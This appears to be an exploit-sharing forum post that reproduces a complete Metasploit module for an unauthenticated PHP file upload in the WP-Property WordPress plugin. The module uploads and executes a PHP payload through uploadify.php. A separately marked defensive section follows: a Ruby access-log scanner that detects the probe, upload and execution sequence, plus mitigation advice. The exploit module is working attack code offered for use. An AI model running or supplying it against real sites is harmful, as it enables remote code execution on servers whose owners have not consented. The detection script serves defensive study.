WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Vulnerability check: a plain GET to the plugin's bundled uploadify.php.
  # A 200 only shows the script is reachable, hence CheckCode::Appears rather
  # than Vulnerable.
  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random .php name for the uploaded file; the PhpEXE mixin builds a
    # self-deleting payload for the selected target.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Multipart body with the two fields uploadify.php reads: 'Filedata' (the
    # file) and 'folder' (the destination directory, here the uploadify dir itself).
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # uploadify.php answers with the path of the stored file; it must contain
    # the name we sent, otherwise the upload did not happen.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is written in or how to use it. I'm talking about msf.
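From the defender's side, the module above leaves a recognisable three-step trace in the web server's access log: a GET probe of uploadify.php (the check method), an unauthenticated POST to the same script (the upload), and a GET for a freshly named .php file in the upload folder (the execution). The following Ruby script is an added example, not part of the forum post or of the Metasploit module, that scans Common Log Format lines for that sequence. It assumes the uploaded file lands in the uploadify directory, which is what the module's 'folder' field requests; the log lines are constructed for the example and use documentation IP ranges.

```ruby
# Added example: detect the WP-Property uploadify.php upload-then-execute
# sequence in Apache/Nginx access logs (Common Log Format).
# Not part of the forum post or of the Metasploit module.

# Constructed sample log (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:51:30 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  203.0.113.7 - - [04/Jan/2013:19:51:31 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 95
  203.0.113.7 - - [04/Jan/2013:19:51:32 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/abcde.php HTTP/1.1" 200 0
  198.51.100.9 - - [04/Jan/2013:19:52:00 +0800] "GET /wordpress/?p=12 HTTP/1.1" 200 4321
  198.51.100.9 - - [04/Jan/2013:19:52:05 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 812
LOG

UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}
UPLOADIFY_PHP = %r{#{UPLOADIFY_DIR}uploadify\.php(\?|\z)}
# Any other .php directly inside the uploadify directory. Assumption: the
# module asks for that folder as the upload destination, so that is where
# its "<5 random letters>.php" file is written.
UPLOADED_PHP  = %r{#{UPLOADIFY_DIR}[^/?\s]+\.php(\?|\z)}

# Minimal Common Log Format parser: client, timestamp, method, path, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3})/

def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Returns findings in log order.
#   :probe  - a GET to uploadify.php (low confidence on its own; the real
#             uploader only POSTs to it)
#   :upload - a POST to uploadify.php that was answered with 200
#   :exec   - the same client then fetched a .php file from the upload folder
def detect_wp_property_upload(log_text)
  uploaders = {}   # client IP => true once an accepted POST was seen
  findings  = []
  log_text.each_line do |line|
    ev = parse_line(line)
    next unless ev
    path = ev[:path]
    if path =~ UPLOADIFY_PHP
      if ev[:method] == 'POST' && ev[:status] == 200
        uploaders[ev[:ip]] = true
        findings << { ip: ev[:ip], ts: ev[:ts], kind: :upload, path: path }
      elsif ev[:method] == 'GET'
        findings << { ip: ev[:ip], ts: ev[:ts], kind: :probe, path: path }
      end
    elsif path =~ UPLOADED_PHP && uploaders[ev[:ip]]
      findings << { ip: ev[:ip], ts: ev[:ts], kind: :exec, path: path }
    end
  end
  findings
end

# Highest-severity finding per client, for a one-line alert per source.
SEVERITY = { probe: 1, upload: 2, exec: 3 }.freeze

def worst_per_ip(findings)
  findings.group_by { |f| f[:ip] }
          .transform_values { |fs| fs.map { |f| f[:kind] }.max_by { |k| SEVERITY[k] } }
end

if __FILE__ == $0
  detect_wp_property_upload(SAMPLE_LOG).each do |f|
    puts "#{f[:ts]} #{f[:ip]} #{f[:kind]} #{f[:path]}"
  end
  puts worst_per_ip(detect_wp_property_upload(SAMPLE_LOG)).inspect
end
```

Run it against a real log with `detect_wp_property_upload(File.read('access.log'))`. The :exec finding is the one worth paging on, since it needs both an accepted POST and a later request for a script that should not exist in that folder; a lone :probe is what the module's check method, or any scanner, produces and is mostly useful for correlation. A cheaper mitigation than log review is to remove or deny access to the plugin's third-party/uploadify directory, or update past 1.35.0.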